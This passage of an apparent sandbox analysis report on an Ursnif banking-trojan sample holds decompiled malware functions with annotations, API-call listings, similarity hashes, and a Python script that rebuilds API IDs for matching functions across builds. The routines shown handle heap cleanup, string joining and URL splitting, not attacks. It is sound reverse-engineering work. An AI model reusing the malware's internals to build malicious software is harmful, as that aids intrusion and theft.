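• Sleep.KERNEL32(0000000A), ref: 0627654A
• HeapFree.KERNEL32(00000000,?), ref: 06276572
• RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06276590
""",
    "0627253B": """
• RtlEnterCriticalSection.NTDLL(0629A428), ref: 0627253B
• Sleep.KERNEL32(0000000A), ref: 06272545
• SetEvent.KERNEL32 ref: 0627259C
• RtlLeaveCriticalSection.NTDLL(0629A428), ref: 062725BB
""",
}

# One report line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Name.MODULE followed by either an argument list or " ref:".
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
)
# CamelCase words; an all-lowercase CRT name (memset, lstrlen) stays one word.
_CAMEL = re.compile(r"[A-Z][a-z0-9]*|[a-z0-9]+")
# Assumption inferred from this page: words of three letters or fewer never
# appear in an API ID (Rtl, Get, Set, For, Of, End are all missing from them).
MIN_TOKEN_LEN = 4


def parse_api_block(text):
    """API names in report order; subcall lines are kept because the report
    counts them towards the calling function's API ID."""
    names = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if m:
            names.append(m.group("name"))
    return names


def api_tokens(name):
    """Words of one API name that contribute to the API ID."""
    if len(name) > 1 and name[-1] in "AW" and name[-2].islower():
        name = name[:-1]  # CreateFileA / lstrlenW -> CreateFile / lstrlen
    return [t for t in _CAMEL.findall(name) if len(t) >= MIN_TOKEN_LEN]


def api_id(names):
    """Group words by occurrence count, most frequent group first, ASCII order
    inside a group, groups joined with '$'."""
    counts = Counter(t for n in names for t in api_tokens(n))
    groups = {}
    for tok, c in counts.items():
        groups.setdefault(c, []).append(tok)
    return "$".join("".join(sorted(groups[c])) for c in sorted(groups, reverse=True))


def api_ids_for(blocks):
    """Function address -> API ID for a dict of copied 'APIs' blocks."""
    return {func: api_id(parse_api_block(text)) for func, text in blocks.items()}


def token_overlap(names_a, names_b):
    """Jaccard overlap (0.0 .. 1.0) of two functions' word multisets; my own
    addition for ranking near-misses that exact API-ID equality would discard."""
    a = Counter(t for n in names_a for t in api_tokens(n))
    b = Counter(t for n in names_b for t in api_tokens(n))
    union = sum((a | b).values())
    return sum((a & b).values()) / union if union else 0.0


if __name__ == "__main__":
    for func, ident in api_ids_for(SAMPLE_BLOCKS).items():
        print(func, ident)
```

Paste any further "APIs" block from this report into SAMPLE_BLOCKS and the rebuilt ID should match the "API ID" line printed under it; a mismatch means the word rule above is incomplete for that name, which is worth knowing before using the IDs to match functions across Ursnif builds.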

                                                          C-Code - Quality: 100%
                                                          			E036D7607() {
                                                          				// Shutdown routine. *0x36da30c holds a global event handle (0x2cc in the
                                                          				// dump), *0x36da35c a global counter that is polled until it reaches zero,
                                                          				// *0x36da2d8 the private heap handle (0x5570000 in the dump).
                                                          				void* _t1;
                                                          				intOrPtr _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t11;
                                                          
                                                          				_t1 =  *0x36da30c; // 0x2cc
                                                          				if(_t1 == 0) {
                                                          					L8:
                                                          					return 0;              // nothing to tear down
                                                          				}
                                                          				SetEvent(_t1);             // signal the global event
                                                          				_t11 = 0x7fffffff;         // wait budget in milliseconds (about 24.8 days)
                                                          				while(1) {
                                                          					SleepEx(0x64, 1);      // 100 ms, alertable, so queued APCs still run
                                                          					_t5 =  *0x36da35c; // 0x0
                                                          					if(_t5 == 0) {
                                                          						break;             // counter reached zero
                                                          					}
                                                          					_t11 = _t11 - 0x64;
                                                          					if(_t11 > 0) {
                                                          						continue;
                                                          					}
                                                          					break;                 // budget exhausted, give up waiting
                                                          				}
                                                          				_t6 =  *0x36da30c; // 0x2cc
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x36da2d8; // 0x5570000
                                                          				if(_t7 != 0) {
                                                          					HeapDestroy(_t7);      // releases every allocation on the private heap at once
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • SetEvent.KERNEL32(000002CC,00000001,036D5E70), ref: 036D7612
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 036D7621
                                                          • CloseHandle.KERNEL32(000002CC), ref: 036D7642
                                                          • HeapDestroy.KERNEL32(05570000), ref: 036D7652
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 6dee44a64a0d34f0bf4b140cfb17050b8903bc24821b6bff7899bb72afc9096b
                                                          • Instruction ID: f1704707fb6956141f5d521019c2ef3a4452c9cd12d1091743d365e484307620
                                                          • Opcode Fuzzy Hash: 6dee44a64a0d34f0bf4b140cfb17050b8903bc24821b6bff7899bb72afc9096b
                                                          • Instruction Fuzzy Hash: 08F08C30E0725287DB20AF7EF94CA5237D8AB14761B0D1104BC00D378DEB30C460D9A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E036D72C7() {
                                                          				void* _v0;
                                                          				void** _t3;
                                                          				void** _t5;
                                                          				void** _t7;
                                                          				void** _t8;
                                                          				void* _t10;
                                                          
                                                          				_t3 =  *0x36da3cc; // 0x59695b0
                                                          				__imp__( &(_t3[0x10]));
                                                          				while(1) {
                                                          					_t5 =  *0x36da3cc; // 0x59695b0
                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t7 =  *0x36da3cc; // 0x59695b0
                                                          				_t10 =  *_t7;
                                                          				if(_t10 != 0 && _t10 != 0x36db827) {
                                                          					HeapFree( *0x36da2d8, 0, _t10);
                                                          					_t7 =  *0x36da3cc; // 0x59695b0
                                                          				}
                                                          				 *_t7 = _v0;
                                                          				_t8 =  &(_t7[0x10]);
                                                          				__imp__(_t8);
                                                          				return _t8;
                                                          			}










                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(05969570), ref: 036D72D0
                                                          • Sleep.KERNEL32(0000000A), ref: 036D72DA
                                                          • HeapFree.KERNEL32(00000000), ref: 036D7308
                                                          • RtlLeaveCriticalSection.NTDLL(05969570), ref: 036D731D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: e793b0cb8772cf3f9771ef051f191e7df12163f5b02c42e224890691791cf955
                                                          • Instruction ID: 97e7102756341ffd0f26146d34ee24f51d4d5ee32f3c8cdcc1b01f3ce3b723f3
                                                          • Opcode Fuzzy Hash: e793b0cb8772cf3f9771ef051f191e7df12163f5b02c42e224890691791cf955
                                                          • Instruction Fuzzy Hash: 90F0DA74E062019BE728EF99F949B2577E5AB85300B0A6018FD02D779CC730A821CA19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 06290B35
                                                          • Sleep.KERNEL32(0000000A), ref: 06290B3F
                                                          • HeapFree.KERNEL32(00000000), ref: 06290B6D
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06290B82
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: e427bd8600fd81dcac94ecc989d4ee9e912bfa67b382ca60b1b661eecfe831a8
                                                          • Instruction ID: bc53a55f187901c8827f3084cf8767d077a08d0fe040605a1d9add5c47105940
                                                          • Opcode Fuzzy Hash: e427bd8600fd81dcac94ecc989d4ee9e912bfa67b382ca60b1b661eecfe831a8
                                                          • Instruction Fuzzy Hash: 08F0D4747503059FEB498B25F95EF6937B6AFC8309B14401CEA07DB251D734A840CE39
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0628095D
                                                          • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,0627C1F8,00000000), ref: 062809AB
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,06291616,00000000,0627C1F8,0628E6A0,00000000,0627C1F8,062800C3,00000000,0627C1F8,0627306D,00000000), ref: 06280CB6
                                                          • GetLastError.KERNEL32(?,00000000,?), ref: 06280FB8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseErrorFreeHandleHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 2333114656-0
                                                          • Opcode ID: 0d1d97448cd183993e3c2a46ec96d41e25f50b416c52ea0675af0e04bf483ef7
                                                          • Instruction ID: 7d8dc01359f20621b21d2a8b7cc6254a0fc3e36f8c88ba4bcf9675576b0d7abd
                                                          • Opcode Fuzzy Hash: 0d1d97448cd183993e3c2a46ec96d41e25f50b416c52ea0675af0e04bf483ef7
                                                          • Instruction Fuzzy Hash: E551FB3263631AFEFBD17E60DC41F6B7659AFB5610F108011FD15A60C0DEB08959CBAA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0628D698: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D6F2
                                                            • Part of subcall function 0628D698: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D710
                                                            • Part of subcall function 0628D698: RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0628D73C
                                                            • Part of subcall function 0628D698: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D753
                                                            • Part of subcall function 0628D698: HeapFree.KERNEL32(00000000,00000000), ref: 0628D766
                                                            • Part of subcall function 0628D698: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D775
                                                          • GetLastError.KERNEL32 ref: 062717EE
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 06283C58
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 06283C7C
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,062717D6,?,?,?,?,?,?,?), ref: 06283C8A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627180A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627181B
                                                          • SetLastError.KERNEL32(00000000), ref: 0627181E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                                          • String ID:
                                                          • API String ID: 2451549186-0
                                                          • Opcode ID: 0761adf020b83e8f9020db0a87f909ff9764dbbd0af5e4f8cfa4d3fd06eda539
                                                          • Instruction ID: dec014aefd943a784f0db2e8c20a4310020470573aca68bbaa5319e368ef0ad9
                                                          • Opcode Fuzzy Hash: 0761adf020b83e8f9020db0a87f909ff9764dbbd0af5e4f8cfa4d3fd06eda539
                                                          • Instruction Fuzzy Hash: 29311832910209BFCF529F99DC48C9EBFB6FF89360B144156FD16A6160D7318A61DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 062863D1: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?), ref: 062863F5
                                                            • Part of subcall function 062863D1: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 06286407
                                                            • Part of subcall function 062863D1: wcstombs.NTDLL ref: 06286415
                                                            • Part of subcall function 062863D1: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?), ref: 06286439
                                                            • Part of subcall function 062863D1: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0628644E
                                                            • Part of subcall function 062863D1: mbstowcs.NTDLL ref: 0628645B
                                                            • Part of subcall function 062863D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?,?), ref: 0628646D
                                                            • Part of subcall function 062863D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?,?), ref: 06286487
                                                          • GetLastError.KERNEL32 ref: 0627A82D
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 06283C58
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 06283C7C
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,062717D6,?,?,?,?,?,?,?), ref: 06283C8A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627A849
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627A85A
                                                          • SetLastError.KERNEL32(00000000), ref: 0627A85D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                                          • String ID:
                                                          • API String ID: 3867366388-0
                                                          • Opcode ID: 7f146c4bfdef0af51011e33799ca73c9bca2a935fd30b17850e5996018e245db
                                                          • Instruction ID: 63679b40616192f4e46445be7b6f9712fa045207f8b2b6d0dd57528dac6a2a13
                                                          • Opcode Fuzzy Hash: 7f146c4bfdef0af51011e33799ca73c9bca2a935fd30b17850e5996018e245db
                                                          • Instruction Fuzzy Hash: B1311831910209EFCF429FA9DC44C9EBFB6FF89760B10415AFA25A6160D7718A61DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: c315edd6ff2106f6e47bc1e55d3121a2bf8e198cf96ec4c77e539c564c770674
                                                          • Instruction ID: 2ed6f4a705c915c033b3038a261c80e7c11fee1ca282c1cf9df6fa83d889b86d
                                                          • Opcode Fuzzy Hash: c315edd6ff2106f6e47bc1e55d3121a2bf8e198cf96ec4c77e539c564c770674
                                                          • Instruction Fuzzy Hash: E6216DB292191BBFCBA1AF61DC85D66BB69FF09300B140119ED4686C50D733E8B1CBD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E036D45C4(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                          				intOrPtr* _v8;
                                                          				void* _t17;
                                                          				intOrPtr* _t22;
                                                          				void* _t27;
                                                          				char* _t30;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t37;
                                                          				void* _t39;
                                                          				int _t42;
                                                          
                                                          				_t17 = __eax;
                                                          				_t37 = 0;
                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                          				_t2 = _t17 + 1; // 0x1
                                                          				_t28 = _t2;
                                                          				_t34 = E036D6D63(_t2);
                                                          				if(_t34 != 0) {
                                                          					_t30 = E036D6D63(_t28);
                                                          					if(_t30 == 0) {
                                                          						E036D6C2C(_t34);
                                                          					} else {
                                                          						_t39 = _a4;
                                                          						_t22 = E036D7A57(_t39);
                                                          						_v8 = _t22;
                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                          							_a4 = _t39;
                                                          						} else {
                                                          							_t26 = _t22 + 2;
                                                          							_a4 = _t22 + 2;
                                                          							_t22 = E036D7A57(_t26);
                                                          							_v8 = _t22;
                                                          						}
                                                          						if(_t22 == 0) {
                                                          							__imp__(_t34, _a4);
                                                          							 *_t30 = 0x2f;
                                                          							 *((char*)(_t30 + 1)) = 0;
                                                          						} else {
                                                          							_t42 = _t22 - _a4;
                                                          							memcpy(_t34, _a4, _t42);
                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                          							__imp__(_t30, _v8);
                                                          						}
                                                          						 *_a8 = _t34;
                                                          						_t37 = 1;
                                                          						 *_a12 = _t30;
                                                          					}
                                                          				}
                                                          				return _t37;
                                                          			}















                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,036D6973,?,?,?,?,00000102,036D37A0,?,?,76CC81D0), ref: 036D45D0
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                            • Part of subcall function 036D7A57: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,036D45FE,00000000,00000001,00000001,?,?,036D6973,?,?,?,?,00000102), ref: 036D7A65
                                                            • Part of subcall function 036D7A57: StrChrA.SHLWAPI(?,0000003F,?,?,036D6973,?,?,?,?,00000102,036D37A0,?,?,76CC81D0,00000000), ref: 036D7A6F
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,036D6973,?,?,?,?,00000102,036D37A0,?), ref: 036D462E
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 036D463E
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 036D464A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 7ce6c93d68d19f528a038a51f24f25ded80f2a3d3b14181917dee6050b777135
                                                          • Instruction ID: 92269eb1997e8ecba37389f30cc84c3b37d985bba72e07d26cc267c630c7740f
                                                          • Opcode Fuzzy Hash: 7ce6c93d68d19f528a038a51f24f25ded80f2a3d3b14181917dee6050b777135
                                                          • Instruction Fuzzy Hash: E821C076D04295ABCB12EF75E884EAABFA8AF05280F095058F9069F201DF35D911CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?,?,00000000), ref: 0627D435
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                            • Part of subcall function 06292DE3: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,0627D463,00000000,00000001,00000001,?,?,0628DD0F,00000000,00000000,00000004,00000000), ref: 06292DF1
                                                            • Part of subcall function 06292DE3: StrChrA.SHLWAPI(?,0000003F,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?,?,00000000,06273EC6,?), ref: 06292DFB
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?), ref: 0627D493
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0627D4A3
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0627D4AF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 33d0ccf869807608567956bc4b747df68cb9b3fcd09fdca9229121a6c38e8076
                                                          • Instruction ID: 5c90ebfa4e95e607a9f1595756ca9d198ad3896c5c7392caf4707ed6b67472ae
                                                          • Opcode Fuzzy Hash: 33d0ccf869807608567956bc4b747df68cb9b3fcd09fdca9229121a6c38e8076
                                                          • Instruction Fuzzy Hash: 3121C032920256AFCB82AF64CC98EAE7FA99F46294B048454ED089B201D675DA00D7F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                                                          • Instruction ID: 0a6a20c0698abe8b671f2d01bbd9a60a1c385b18e130b8bc6c3e40c8ad5acea8
                                                          • Opcode Fuzzy Hash: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                                                          • Instruction Fuzzy Hash: 6711917296291ABFC790BFA0DC84A567778FF09300B050118ED45A2C90DB76F5B1DBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			void* E036D28C4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				/* Decompiled wide-string concatenation: allocates one buffer large enough for
                                                          				   _a4 followed by _a8 (both UTF-16), copies both in, and returns the buffer,
                                                          				   or NULL when the allocation fails. */
                                                          				void* _v8;
                                                          				void* _t18;
                                                          				int _t25;
                                                          				int _t29;
                                                          				int _t34;
                                                          				int _t10;
                                                          
                                                          				_t29 = lstrlenW(_a4);                               // length of first string, in WCHARs
                                                          				_t25 = lstrlenW(_a8);                               // length of second string, in WCHARs
                                                          				_t18 = E036D6D63(_t25 + _t29 + _t25 + _t29 + 2);    // 2*(len1+len2) bytes + 2 for the terminator, via the heap-allocation wrapper
                                                          				_v8 = _t18;
                                                          				if(_t18 != 0) {
                                                          					_t34 = _t29 + _t29;                             // byte length of the first string
                                                          					memcpy(_t18, _a4, _t34);
                                                          					_t10 = _t25 + 2; // 0x2
                                                          					memcpy((char*)_v8 + _t34, _a8, _t25 + _t10);    // 2*len2 + 2 bytes: second string plus its NUL terminator
                                                          				}
                                                          				return _v8;
                                                          			}
                                                          0x036d28d9
                                                          0x036d28dd
                                                          0x036d28e7
                                                          0x036d28ec
                                                          0x036d28f1
                                                          0x036d28f3
                                                          0x036d28fb
                                                          0x036d2900
                                                          0x036d290e
                                                          0x036d2913
                                                          0x036d291d

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,76C85520,00000008,059693F4,?,036D21EB,004F0053,059693F4,?,?,?,?,?,?,036D66BE), ref: 036D28D4
                                                          • lstrlenW.KERNEL32(036D21EB,?,036D21EB,004F0053,059693F4,?,?,?,?,?,?,036D66BE), ref: 036D28DB
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • memcpy.NTDLL(00000000,004F0053,76C869A0,?,?,036D21EB,004F0053,059693F4,?,?,?,?,?,?,036D66BE), ref: 036D28FB
                                                          • memcpy.NTDLL(76C869A0,036D21EB,00000002,00000000,004F0053,76C869A0,?,?,036D21EB,004F0053,059693F4), ref: 036D290E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: eb1af2adb76017e40f73d4395a6c4a2806d0f2fb4ce99aac57c9927c0e840cbd
                                                          • Instruction ID: be9c6001698bdc38f3d81c1a9da7721cb7d6637eda4a81051362f25e04a49e40
                                                          • Opcode Fuzzy Hash: eb1af2adb76017e40f73d4395a6c4a2806d0f2fb4ce99aac57c9927c0e840cbd
                                                          • Instruction Fuzzy Hash: 2EF0497AD00119BB8F11EFA9DC84CCE7BACEF082547154066E904DB205E731EA148BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(69B25F44,?,?,00000000,06285F22,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 062881A4
                                                          • lstrlen.KERNEL32(?,?,?,?), ref: 062881A9
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 062881C5
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 062881E3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                                          • String ID:
                                                          • API String ID: 1697500751-0
                                                          • Opcode ID: 3fda720ea70a07f55cc77b11d4265c4cf5d92ece5e64ef9b294d74746103d103
                                                          • Instruction ID: a6013257a57a4ada7ddc2c81d991233ce1d3b07bd63d8a25c1154e34ea4e6218
                                                          • Opcode Fuzzy Hash: 3fda720ea70a07f55cc77b11d4265c4cf5d92ece5e64ef9b294d74746103d103
                                                          • Instruction Fuzzy Hash: 6FF04677801752AFD762A6699C4CF1B7B9CBFC8211B480411ED1883100EB35D404CBB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(05969B68,00000000,00000000,00000000,036D5902,00000000), ref: 036D394C
                                                          • lstrlen.KERNEL32(?), ref: 036D3954
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • lstrcpy.KERNEL32(00000000,05969B68), ref: 036D3968
                                                          • lstrcat.KERNEL32(00000000,?), ref: 036D3973
